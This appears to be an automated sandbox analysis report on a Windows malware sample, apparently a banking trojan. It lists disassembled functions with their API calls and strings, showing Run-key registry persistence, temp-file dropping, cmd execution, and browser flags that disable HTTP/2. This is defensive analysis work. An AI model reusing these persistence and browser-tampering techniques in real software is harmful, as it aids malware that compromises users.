API String ID: 4198405257-1852062776
Opcode ID: aeecf5c35b5c3b6181c3d1cf31fb31f2e364733bc3bbea4041577064d139ce19
Instruction ID: 19cd95f6d742eea6f9df4ab95de2da2fe4165feedeece2d60023414bdb7be078
Opcode Fuzzy Hash: aeecf5c35b5c3b6181c3d1cf31fb31f2e364733bc3bbea4041577064d139ce19
Instruction Fuzzy Hash: 59518A71E50309AFCF109FA4CC85FEE7BA9EB44304F15842AF806E7251DB74AA90DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009B71EC, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,009B6102,?,?,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009B7203
lstrlenW.KERNEL32(\sols,?,00000000,009B23FE), ref: 009B720E
lstrlenW.KERNEL32(?,?,00000000,009B23FE), ref: 009B7216
RtlAllocateHeap.NTDLL(00000000,?), ref: 009B722B
lstrcpyW.KERNEL32(00000000,?), ref: 009B723C
lstrcatW.KERNEL32(00000000,\sols), ref: 009B724E
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,009B23FE), ref: 009B7253
lstrcatW.KERNEL32(00000000,009D83E0), ref: 009B725F
lstrcatW.KERNEL32(00000000,?), ref: 009B7267
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,009B23FE), ref: 009B726C
lstrcatW.KERNEL32(00000000,009D83E0), ref: 009B7278
lstrcatW.KERNEL32(00000000,00000002), ref: 009B7293
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000,009B23FE), ref: 009B729B
HeapFree.KERNEL32(00000000,00000000,?,00000000,009B23FE), ref: 009B72A9

Strings

\sols, xrefs: 009B71EC, 009B71ED, 009B720D, 009B724C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: 51da9aea6960dc7157f383f9a835a6cc65d85e16bc219ffad42e513b56839fa2
Instruction ID: 9913a9fe9dfe92362090101581debd1fe0e847c01ae2ccda2d2d9fb25c111919
Opcode Fuzzy Hash: 51da9aea6960dc7157f383f9a835a6cc65d85e16bc219ffad42e513b56839fa2
Instruction Fuzzy Hash: 7821F3321AA215BFC3216F64DC85FBBBBACFFC5B54F00051AF50192162DF609845EB64

Uniqueness

Uniqueness Score: -1.00%

Function 009CFAB4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 009CFAD8

Part of subcall function 009CE55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,009D4D11,00000000,00000000,00000000), ref: 009CE581
Part of subcall function 009CE55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,009D4D11,00000000,00000000,00000000), ref: 009CE5AA
Part of subcall function 009CE55A: RegCloseKey.ADVAPI32(?,?,?,009D4D11,00000000,00000000,00000000,00000000), ref: 009CE5E1

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 009CFB13
lstrcpyW.KERNEL32(-00000002,?), ref: 009CFB74
lstrcatW.KERNEL32(00000000,.exe), ref: 009CFB82
lstrcpyW.KERNEL32(?), ref: 009CFB9C
lstrcatW.KERNEL32(00000000,.dll), ref: 009CFBA4

Part of subcall function 009C447F: lstrlenW.KERNEL32(?,.dll,?,00000000,009BA218,?,.dll,?,00001000,?,?,?), ref: 009C448D
Part of subcall function 009C447F: lstrlen.KERNEL32(DllRegisterServer), ref: 009C449B
Part of subcall function 009C447F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 009C44B0

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 009CFC02

Part of subcall function 009C7854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,009BF7B7,004F0053,00000000), ref: 009C7860
Part of subcall function 009C7854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,009BF7B7,004F0053,00000000), ref: 009C7888
Part of subcall function 009C7854: memset.NTDLL ref: 009C789A

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 009CFC37
GetLastError.KERNEL32 ref: 009CFC42
HeapFree.KERNEL32(00000000,00000000), ref: 009CFC58
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 009CFC6A

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009CFACD
.dll, xrefs: 009CFB9E
.exe, xrefs: 009CFB7C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenQueryValuelstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 2243210721-2351516416
Opcode ID: 2d0c945213141b24ae9ffd9081da995360a93d9bebac1913d3542909bc174bde
Instruction ID: 14deb33ab6aca5ce9fba455117a421f9c40185903d3f8470a6587b0a02c6510b
Opcode Fuzzy Hash: 2d0c945213141b24ae9ffd9081da995360a93d9bebac1913d3542909bc174bde
Instruction Fuzzy Hash: 33419F32E56119BBDB11AFA0DC54FAE7BBEFF44304F10056AF900A2161DB309E41EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009BB598, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009BB5AD

Part of subcall function 009D134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,009C1372,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?,00000001), ref: 009D135A
Part of subcall function 009D134B: mbstowcs.NTDLL ref: 009D1376

lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB5E6
wcstombs.NTDLL ref: 009BB5F0
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB621
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB64D
TerminateProcess.KERNEL32(?,000003E5), ref: 009BB663
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB677
GetLastError.KERNEL32 ref: 009BB67B
GetExitCodeProcess.KERNEL32(?,00000001), ref: 009BB69B
CloseHandle.KERNEL32(?), ref: 009BB6AA
CloseHandle.KERNEL32(?), ref: 009BB6AF
GetLastError.KERNEL32 ref: 009BB6B3

Strings

cmd /C "%s> %s1", xrefs: 009BB59E
D, xrefs: 009BB5C1

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
Opcode ID: 893a067f4e0cf7ea5ff77b5553aba0910d6cb999ed1ef3068adfe049e2fc97f7
Instruction ID: 902fac640caf1bc170419945cd182af8777b7327200ff5b58e725bd35755d039
Opcode Fuzzy Hash: 893a067f4e0cf7ea5ff77b5553aba0910d6cb999ed1ef3068adfe049e2fc97f7
Instruction Fuzzy Hash: DB4149B1D05118FFDF11AFA4CE85AEEBBBCEB08324F20446AF501A3191DBB15E449B61

Uniqueness

Uniqueness Score: -1.00%

Function 009CAD28, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 009CAD39
GetTempPathA.KERNEL32(00000000,00000000,?,?,009D0C92,00000094,00000000,00000000), ref: 009CAD51
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 009CAD60
GetTempPathA.KERNEL32(00000001,00000000,?,?,009D0C92,00000094,00000000,00000000), ref: 009CAD73
GetTickCount.KERNEL32 ref: 009CAD77
wsprintfA.USER32 ref: 009CAD87
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 009CADBB
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 009CADD3
lstrlen.KERNEL32(00000000), ref: 009CADDD
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 009CADED
RegCloseKey.ADVAPI32(?), ref: 009CADF9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 009CAE07

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009CADB1
%lu.exe, xrefs: 009CAD81

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3778301466-2576086316
Opcode ID: b256bd235680f9ac0d8c2031f021cee032b98fb87432948e7400795128714849
Instruction ID: 7ba9053df823e8bf5b9bbf1b31091e4ee363f104e686b25fe8f91e29d73d4055
Opcode Fuzzy Hash: b256bd235680f9ac0d8c2031f021cee032b98fb87432948e7400795128714849
Instruction Fuzzy Hash: CC219E71456218FFDB105FA1DC88EEF7F6CEF44399B104026F906C2161DB708D91EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B1460, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 009C798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 009C79CF
Part of subcall function 009C798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 009C79E7
Part of subcall function 009C798A: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AAD
Part of subcall function 009C798A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AD6
Part of subcall function 009C798A: HeapFree.KERNEL32(00000000,009B1489,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AE6
Part of subcall function 009C798A: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AEF

lstrcmp.KERNEL32(?,?), ref: 009B14D7
HeapFree.KERNEL32(00000000,?), ref: 009B1503
GetCurrentThreadId.KERNEL32 ref: 009B15A9
GetCurrentThread.KERNEL32 ref: 009B15BA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,009C5B4A,?,00000001), ref: 009B15F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,009C5B4A,?,00000001), ref: 009B160B
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 009B1619
wsprintfA.USER32 ref: 009B162A
lstrlen.KERNEL32(00000000,00000000), ref: 009B1635

Part of subcall function 009CECB1: lstrlen.KERNEL32(?,00000000,009D6C86,74785520,009B4BBD,?,?,?,009B15E5,?,?,00000000,?,009C5B4A,?,00000001), ref: 009CECBB
Part of subcall function 009CECB1: lstrcpy.KERNEL32(00000000,?), ref: 009CECDF
Part of subcall function 009CECB1: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,009B15E5,?,?,00000000,?,009C5B4A,?,00000001), ref: 009CECE6
Part of subcall function 009CECB1: lstrcat.KERNEL32(00000000,00000001), ref: 009CED3D

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 009B164F
HeapFree.KERNEL32(00000000,00000000), ref: 009B1660
HeapFree.KERNEL32(00000000,?), ref: 009B166C

Strings

DLL load status: %u, xrefs: 009B1624

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: 048893748f3cbf71687f1c91471f29b56e4078bc4711ee2152d749c8b06eea5a
Instruction ID: d71a660c4fbbfe043c887367d7386e316b5ca2c2ecdc624ceb05314eaf41ef0f
Opcode Fuzzy Hash: 048893748f3cbf71687f1c91471f29b56e4078bc4711ee2152d749c8b06eea5a
Instruction Fuzzy Hash: 8D711271925218EFCB11DFA4DD85EEEBBB9FF48350F50802AF505A7260D770A980EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C7F3D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

memset.NTDLL ref: 009C7F6B
StrChrA.SHLWAPI(?,0000000D), ref: 009C7FB1
StrChrA.SHLWAPI(?,0000000A), ref: 009C7FBE
StrChrA.SHLWAPI(?,0000007C), ref: 009C7FE5
StrTrimA.SHLWAPI(?,009DA48C), ref: 009C7FFA
StrChrA.SHLWAPI(?,0000003D), ref: 009C8003
StrTrimA.SHLWAPI(00000001,009DA48C), ref: 009C8019
_strupr.NTDLL ref: 009C8020
StrTrimA.SHLWAPI(?,?), ref: 009C802D
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 009C8075
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,009D83E4,00000002,?,?), ref: 009C8094

Strings

, xrefs: 009C8025
;, xrefs: 009C7FD3

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: fb4d303ed6f9fe2339ca4eb0e5984309227e2b3ae7d5f2154ed353872dd32a88
Instruction ID: cfe585cd94f2cc8f90b53bcd0dfeeadb741b928bcce1a00fa54cda702152c5fa
Opcode Fuzzy Hash: fb4d303ed6f9fe2339ca4eb0e5984309227e2b3ae7d5f2154ed353872dd32a88
Instruction Fuzzy Hash: AF41CE71A483059FD720DF288C45F6BBBECAB84340F04481EF8959B252DB74D908CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 009CAE20, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 009CAE39
lstrlen.KERNEL32(?), ref: 009CAE3F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009CAE4F
lstrcpy.KERNEL32(00000000,?), ref: 009CAE69
lstrlen.KERNEL32(?), ref: 009CAE81
lstrlen.KERNEL32(?), ref: 009CAE8F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 009CAEDD
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 009CAF01
lstrlen.KERNEL32(?), ref: 009CAF2F
HeapFree.KERNEL32(00000000,?,?), ref: 009CAF5A
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 009CAF71
HeapFree.KERNEL32(00000000,?,?), ref: 009CAF7E

Strings

http, xrefs: 009CAF08, 009CAF18

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: 05394a0c8029a37f6e9fc8e76549d825ee8854e7d2410a01dc45e8626b62bef4
Instruction ID: 331629bef506388b16f337ff252398cf08236d45ee8be910f2305f02a7f2f5ad
Opcode Fuzzy Hash: 05394a0c8029a37f6e9fc8e76549d825ee8854e7d2410a01dc45e8626b62bef4
Instruction Fuzzy Hash: AA4146B1A0120DBFDF229FA4CC84FAE7BB9FB08344F10846AF91596161D7719E50DB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C4C88, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 009C4C9F
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,009D0E25,00000094,00000000,00000001,00000094,00000000,00000000,009B45A1,00000000,00000094,00000000), ref: 009C4CB1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,009D0E25,00000094,00000000,00000001,00000094,00000000,00000000,009B45A1,00000000,00000094,00000000), ref: 009C4CBE
wsprintfA.USER32 ref: 009C4CD2
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,009B45A1,00000000,00000094,00000000), ref: 009C4CE8
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 009C4D01
WriteFile.KERNEL32(00000000,00000000), ref: 009C4D09
GetLastError.KERNEL32 ref: 009C4D17
CloseHandle.KERNEL32(00000000), ref: 009C4D20
GetLastError.KERNEL32(?,00000000,?,009D0E25,00000094,00000000,00000001,00000094,00000000,00000000,009B45A1,00000000,00000094,00000000), ref: 009C4D31
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,009D0E25,00000094,00000000,00000001,00000094,00000000,00000000,009B45A1,00000000,00000094,00000000), ref: 009C4D41

Strings

t, xrefs: 009C4D01
\\.\%s, xrefs: 009C4CCC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s$t
API String ID: 3873609385-608182569
Opcode ID: e8e3374c1015a2457314489ed35f6f92e7dccfb8881a58ff936577ff7fd51837
Instruction ID: 01dbdd00d27c12f1f3bb7f5ed1e886765d3850f7bf90af58f3a6a7fefd2b4f62
Opcode Fuzzy Hash: e8e3374c1015a2457314489ed35f6f92e7dccfb8881a58ff936577ff7fd51837
Instruction Fuzzy Hash: BE11D67169B2147FD3213B65EC8CFBB3B6CEB467A5F00042AF947D2191DE501C899572

Uniqueness

Uniqueness Score: -1.00%

Function 009B4393, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 009B43E2
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 009B43FB
StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 009B4406
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 009B441F
lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?), ref: 009B44C8
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 009B44EA
lstrcpy.KERNEL32(00000020,?), ref: 009B4509
lstrlen.KERNEL32(?,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001,00000000), ref: 009B4513
memcpy.NTDLL(?,?,?,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 009B4554
memcpy.NTDLL(?,?,?,?,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?), ref: 009B4567
SwitchToThread.KERNEL32(00000057,00000000,?,0000010F,?,?,?,?,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057), ref: 009B458B
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000010F,?,?,?,?,?,00000000,009BB033,?,00000000,0000010F), ref: 009B45AA
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?), ref: 009B45D0
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,009BB033,?,00000000,0000010F,00000001,00000057,?), ref: 009B45EC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: 882d612f221f35e85808abc7789898bbe5defb43825aeabb52b1cfd6bdcf4f96
Instruction ID: 6d40fa58e9e576048bc0dbadfea70344034455999ad7ac907e32f8f15ce58257
Opcode Fuzzy Hash: 882d612f221f35e85808abc7789898bbe5defb43825aeabb52b1cfd6bdcf4f96
Instruction Fuzzy Hash: 07719D31508301AFC721DF24DC44B9BBBE9FB88310F04492EF58593261D774E999EB92

Uniqueness

Uniqueness Score: -1.00%

Function 009B5068, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 009B5082
PathFindFileNameW.SHLWAPI(?), ref: 009B5098
lstrlenW.KERNEL32(00000000), ref: 009B50DB
RtlAllocateHeap.NTDLL(00000000,009D69FC), ref: 009B50F1
memcpy.NTDLL(00000000,00000000,009D69FA), ref: 009B5104
_wcsupr.NTDLL ref: 009B510F
lstrlenW.KERNEL32(?,009D69FA), ref: 009B5148
RtlAllocateHeap.NTDLL(00000000,?,009D69FA), ref: 009B515D
lstrcpyW.KERNEL32(00000000,?), ref: 009B5173
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 009B5191
HeapFree.KERNEL32(00000000,00000000), ref: 009B51A0

Strings

--use-spdy=off --disable-http2, xrefs: 009B518B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: 48461c1c255dc71e47dbc016ab078a4a4dd16c7b9a4ee7ec81f99c80d5643185
Instruction ID: 3818ba38be8e19b32ed7f426d2e58242192706bdd745ea6140e63f47761d561d
Opcode Fuzzy Hash: 48461c1c255dc71e47dbc016ab078a4a4dd16c7b9a4ee7ec81f99c80d5643185
Instruction Fuzzy Hash: 5F314A36569A14ABC3206F78DD88FAF7BACEB84330F16461AF551C2191DF70DC419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009CBDEF, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 009CBE13
GetCurrentThreadId.KERNEL32 ref: 009CBE29
GetCurrentThread.KERNEL32 ref: 009CBE3A

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

Part of subcall function 009B81A5: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,009CBE81,00000020,00000000,?,00000000), ref: 009B8210
Part of subcall function 009B81A5: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,009CBE81,00000020,00000000,?,00000000), ref: 009B8238

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 009CBEAF
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 009CBEBF
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 009CBF0B
wsprintfA.USER32 ref: 009CBF1C
lstrlen.KERNEL32(00000000,00000000), ref: 009CBF27
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 009CBF41

Strings

PluginRegisterCallbacks, xrefs: 009CBECB
W, xrefs: 009CBEF8
DLL load status: %u, xrefs: 009CBF16

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: 2e5e981065e6a0fac8322d675f0e712c42def3d7b03d54faea7bf481b27a86c7
Instruction ID: 701de1a3794f36ef6ea7d7b5fc67e58f1621d90475d91eebc67f1173daa967f4
Opcode Fuzzy Hash: 2e5e981065e6a0fac8322d675f0e712c42def3d7b03d54faea7bf481b27a86c7
Instruction Fuzzy Hash: D2417C30956209BBCF11AFA5DC49EEF7FB9EF44750F10441AF60592161DB308A90EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009D4CD0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 009D4CEC

Part of subcall function 009CE55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,009D4D11,00000000,00000000,00000000), ref: 009CE581
Part of subcall function 009CE55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,009D4D11,00000000,00000000,00000000), ref: 009CE5AA
Part of subcall function 009CE55A: RegCloseKey.ADVAPI32(?,?,?,009D4D11,00000000,00000000,00000000,00000000), ref: 009CE5E1

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009D4D24
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009D4D35
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 009D4D70
RegSetValueExA.ADVAPI32(00000000,72617453,00000000,00000004,?,00000004), ref: 009D4D92
RegCloseKey.ADVAPI32(?), ref: 009D4D9B
RtlEnterCriticalSection.NTDLL(00000000), ref: 009D4DB1
HeapFree.KERNEL32(00000000,?), ref: 009D4DC6
RtlLeaveCriticalSection.NTDLL(00000000), ref: 009D4DD6
HeapFree.KERNEL32(00000000,?), ref: 009D4DEB
RegCloseKey.ADVAPI32(?), ref: 009D4DF0

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 009D4CDC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseValue$CriticalFreeHeapQuerySection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3028791806-1428018034
Opcode ID: 86461c50d4e8947205ae45db92b204f4702e28588e90d9023a6e78cf5d4db6b0
Instruction ID: 0695edca857e90066c930c927307f719df06fcb8b77a867190df2a701a521a20
Opcode Fuzzy Hash: 86461c50d4e8947205ae45db92b204f4702e28588e90d9023a6e78cf5d4db6b0
Instruction Fuzzy Hash: B13146719A6109FFDB11AF94DC48DAEBBBEFB44304B108467F505E2160D731AA94EF60

Uniqueness

Uniqueness Score: -1.00%

Function 009D23B3, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

DeleteFileA.KERNEL32(00000000,000004D2), ref: 009D23D6
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 009D23DF
GetLastError.KERNEL32 ref: 009D23E9
HeapFree.KERNEL32(00000000,00000000), ref: 009D246D

Strings

Disallowed, xrefs: 009D2420
